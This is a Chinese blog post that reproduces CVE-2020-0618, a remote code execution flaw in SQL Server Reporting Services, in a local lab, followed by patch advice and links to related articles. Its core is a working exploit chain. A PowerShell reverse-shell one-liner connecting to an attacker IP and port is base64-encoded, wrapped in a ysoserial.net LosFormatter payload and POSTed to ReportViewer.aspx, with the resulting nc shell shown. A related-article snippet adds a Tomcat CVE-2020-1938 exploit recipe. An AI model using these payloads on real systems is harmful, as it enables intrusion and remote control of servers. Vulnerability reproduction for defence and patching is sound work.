sqlserver 2017修复安装_(CVE-2020-0618)SQL Server 远程代码执行复现

最新推荐文章于 2024-04-25 22:35:12 发布
最新推荐文章于 2024-04-25 22:35:12 发布
阅读量439 收藏
点赞数
文章标签: sqlserver 2017修复安装
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39622901/article/details/113320237
版权
本文详细介绍了CVE-2020-0618,一个影响SQL Server Reporting Services的远程代码执行漏洞。文章通过0x00到0x05的章节,从漏洞简介、影响版本、环境搭建、漏洞复现和修复方式等方面,逐步展示了如何利用和防范该漏洞。攻击者可以通过精心构造的请求在报表服务器服务帐户上下文中执行任意代码。微软已经发布了安全更新来修复这个问题,建议受影响的用户尽快安装补丁。
摘要由CSDN通过智能技术生成

e27a1c95a8d21c5ef99dcb63b85919c0.png

0x00简介

2月12日,微软发布安全更新披露了Microsoft SQL Server Reporting Services 远程代码执行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。

32210031a2227588a51ada26c0232a88.png

0x01漏洞简介

获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码。

0x02影响版本

SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)

SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)

SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)

SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)

SQL Server 2014 Service Pack 3 for x64-based Systems (CU)

SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)

SQL Server 2016 for x64-based Systems Service Pack 1

SQL Server 2016 for x64-based Systems Service Pack 2 (CU)

SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)

0x03环境搭建

1. 下载安装windows server2016标准版standard

0c8288a78f8d0e313e807bca2bb9c20d.png

下载地址:

ed2k://|file|cn_windows_server_2016_x64_dvd_9718765.iso|6176450560|CF1B73D220F1160DE850D9E1979DBD50|/            //使用迅雷打开

2. 下载安装Sql Server 2016数据库

选择全新安装sqlserver

4578d2484c0121c13ff6b32a72af8859.png

一直下一步到功能选择勾上"数据库引擎服务"和"Reporting Services"服务。

3b5f27ae6641c85a40f03395b3558cdb.png

在”数据库引擎配置”选择混合模式创建账号 账号:sa 密码:123456便于后面连接报表服务器。

e5fa3dea472ff50ddd673461aa55e599.png

b93c5b19cccd7afce92c4c076e27e705.png

访问 http://localhost/ReportS,创建分页报表,提示需要安装报表服务器。

2036a912841b2e95d9e0db65c77cc601.png

下载报表生成器,安装好报表服务器后,新建一个报表

4b2d05fbb5dc79e9a6beb7676b80ab1a.png

c16450e9f05008b63854d8f000a28caf.png

52cb92ec624826ff1ca2ab1af7e00e8d.png

此时就用到了我们前面设置的账号密码 sa/123456

2062de52b760156a3f11d8660901690c.png

cbb6d6f1ecd7671cb2efafc390be1f4a.png

然后把左侧字段拉到右测即可

896cac6468fb77a0e3e4147890997542.png

到了这里报表就创建好了

cc138de237da1bf8c7c16fb65179566a.png

保存一下,然后点击运行

174858beb92a1bdaf1895211d462aa72.png

3826226730aeb485c025961a01f8b8ef.png

在浏览器访问漏洞路径:

http://localhost/ReportServer/Pages/ReportViewer.aspx

144322b7cfc3d19b8ecf2dd9b973c489.png

0x04漏洞复现

1. 下载POC编译工具

下载地址:https://github.com/incredibleindishell/ysoserial.net-complied

2.使用powershell打开ysoserial.exe工具生成有效负载,执行完最后一步的时候payload已经存在于剪切板。

1. $command = '$client = New-Object System.Net.Sockets.TCPClient("nc反弹的ip",监听的端口);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

2. $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)

3. $encodedCommand = [Convert]::ToBase64String($bytes)

4. .ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

383507eac5c39cb88bf0a89d49dc8ab2.png

3.下载Postman-win64-7.22.1:https://www.postman.com/

安装并启动postman,发送方式POST,地址http://localhost/ReportServer/pages/ReportViewer.aspx

Body中填入键值对

NavigationCorrector$PageState= NeedsCorrection

NavigationCorrector$ViewState=payload(payload生成方式上面讲到)

__VIEWSTATE=

如下图

da40b9c4a2d4f6de648b9fc930bb5692.png

Authorization中TYPE选择NTLM,用户名密码出填入本机用户的用户名和密码,如下图

e5bee000e1701f624aa9cb828fda8b3a.png

注意此处如果不配置Authorization,发送后会返回401 unauthorized

配置完成后,点击发送,返回结果如下图

ae01bc481ebc5de126ac1dfadd8559c3.png

回到nc查看已经成功收到反连shell,如下图

b04e14d9b17d6e516d49edf4f7d9c494.png

我们在执行几个命令

562c1aa5e11a6fa4949002149c07a9f0.png

0x05修复方式

目前微软官方已针对受支持的版本发布了修复该漏洞的安全补丁,请受影响的用户尽快安装补丁进行防护。

临时修复方案

将Reporting Services监听ip改为本地。暂时禁用外部连接,保证此服务安全。

59e1c520734befdc8d0b4ea8b1ac7ff4.png
weixin_39622901
关注
Apache Kylin 远程命令执行漏洞复现[CVE-2020-13925]
0xSec
12-25 965
Apache Kylin™是一个开源的分布式分析引擎,提供Hadoop之上的SQL查询接口及多维分析(OLAP)能力以支持超大规模数据,最初由eBay Inc. 开发并贡献至开源社区。它能在亚秒内查询巨大的Hive表。
sqlserver 2017修复安装_SQL Server各版本代号、补丁汇总(非官方)
weixin_30340269的博客
01-20 1086
版本和补丁说明:CTP:社区预览版(beta 发布)RC:发布候选 Release CandidateRTM:量产版, 正式发布时候的版本. 这个版本就是你从 MSDN下载下来的或者购买到的SQL Server安装光盘里的版本.CU:累计更新;累积更新包含从上一个SP补丁包开始添加的bug修复和增强,并将包含在下一个SP补丁包中。累积更新的安装类似于SP补丁包的安装。累积更新不是完全回归...
sqlserver 2017修复安装_解决SQLServer2000安装被挂起的方法
weixin_31233537的博客
01-25 856
安装 SQL2000 时,系统经常会出现“以前的某个程序已在安装计算机上创建挂起的文件操作。运行安装之前必须重新启动计算机”的提示,下面新睿云分享一下几种解决SQL Server 2000安装被挂起的方法 。问题重新安装SQL Server的时候出现的情况。“以前的某个程序已在安装计算机上创建挂起的文件操作。运行安装之前必须重新启动计算机”的提示。解决方法:关于SQL安装被挂起的修复大家可能都遇到...
Sql server安装修复程序
07-25
修复sql sever安装过程中提示"性能监视器计数器要求错误",让你可以顺利装上sql server
sqlserver数据库安装错误修复
11-25
数据库安装时提示挂起或服务器配置错误解决办法
SQL安装失败修复
08-22
SQL server 2008安装失败后无需卸载执行语句后便可以重新安装
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
m0_60721649的博客
04-06 1332
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**薪资区间6k-15k。
SQL Server 远程代码执行漏洞复现cve-2020-0618
weixin_45006525的博客
04-26 2399
SQL Server 远程代码执行漏洞复现cve-2020-0618) 简介 SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。 漏洞概述 低权限的攻击者向影响版本SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码,即可实现getshell。 影响版本 SQL Server 2012 for 32-bit Systems Service Pack 4
SQL Server 远程代码执行漏洞(CVE-2020-0618复现
玄道的网安博客
04-20 3408
简介 SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。 漏洞概述 获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码。 影响版本 SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE) SQL Server 2012 for x64-bas..
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
SQL Server 2017 SP1 补丁发布(一)
ivandick的专栏
10-21 1784
 SQL Server 2017 SP1 补丁发布(一) http://weibo.com/p/23047912355518 http://weibo.com/p/23047912355528 http://weibo.com/p/23047912355526 http://weibo.com/p/23047912355540 http://weibo.com/p/23047912
sqlserver数据库修复
09-24 798
支持从dbcc checkdb检测日志报错 修正文件 例如各种分配错误 找不到块等错误 支持数据库不能附加,有损坏事务 9003 9004 错误或者页校验损坏 823 824 等情况 支持数据库版本及总块数获取、 支持检测数据库是否丢失页 支持从其他文件导入块 支持mdf系统表严重损坏从老备份MDF获取系统表 支持重建pfs gam sgam等块 支持反删除表 然后使用数据库恢复软件 恢复被删除的表数据 支持表架构损坏修复 支持自由编辑 数据库页面 任意hex值。 完全独立处理下列故障.
SQL Server 2017中的可恢复索引概述
culuo4781的博客
07-18 390
Managing indexes is a critical component of database maintenance but we often don’t think about the indicators behind the index maintenance operations. SQL Server2017 (CTP2.0) introduces a very ...
[更新1.0:EXP公开]CVE-2020-0618: 微软 SQL Server 报表服务远程代码执行漏洞通告
爱国小白帽
09-19 1658
360CERT [三六零CERT](javascript:void(0)???? 昨天 报告编号:B6-2020-091801 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-18 0x01 更新概览 2020年09月18日,360CERT监测发现该漏洞利用脚本已公开。可造成 远程代码执行。本次更新标识该漏洞的利用工具公开,并可能在短时间内出现攻击态势。 0x02 漏洞简述 2020年02月16日, 360CERT对微软 2 月份安全更新中的 SQL Server Repor
Sql Server数据库由于未知原因丢失的恢复方法
weixin_34125592的博客
10-11 1430
故障描述: 5块2T硬盘组建RAID5,划分LUN供windows服务器使用。在windows服务器内装有Sql Server2008数据库。存储空间内共有三个逻辑分区,大小分别为500G、800G、2.3T。数据库文件丢失,主要涉及五个数据库,表个数约为6000个左右。丢失原因未知,且不能确定数据存储位置。三个数据库的大小分别为8G、15G、20G。在文件丢失后服务器仍处于开机状态,但并未写入大...
sqlserver中65535_漏洞分析|微软 SQL Server 远程代码执行漏洞(CVE20200618
weixin_33514475的博客
12-17 898
漏洞描述近日,微软发布了2月安全更新公告,其中CVE-2020-0618 SQL Server 远程命令执行漏洞在国内存在危害,SQL Server 在国内使用量大。Microsoft SQL Server(微软结构化查询语言服务器)是由微软公司所推出的关系型数据库解决方案。漏洞存在于ReportingServicesWebServer.dll中,Microsoft.Reporting....
记录一下重装SQLServer的过程
weixin_51046930的博客
04-16 743
重装SQLserver的记录
【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告
爱国小白帽
02-21 5473
【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告 原创 绿盟安全服务部 绿盟科技安全情报 4天前 通告编号:NS-2020-0008 2020-02-17 TAG: SQL Server远程代码执行CVE-2020-0618 漏洞危害: 攻击者利用此漏洞,可造成远程代码执行,PoC已公开。 版本: 1.0 1 漏洞概述 2月...
SQLServer安装教程(史上最详细图文版本)
最新发布
AV_VA1的博客
04-25 2万+
不要勾选Analysis Services(勾选了其实也没事,因为本来就没有安装这个功能,在最后的时候可能会出现报错—提醒安装完成但未成功,其实也没啥事,就是勾选了这个功能但之前没有安装Analysis罢了)其中,这一步里有个实例目录,我建议在你下载SQL Server的文件夹中新建三个文件,然后放里面,因为默认的是C盘,你改到D盘或者其他盘就行。如果你勾选Analysis Services,到安装最后会弹出来这个窗口,但没事的,这样也代表安装成功的。选择安装位置(最好安装到除C盘以外的文件中)
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值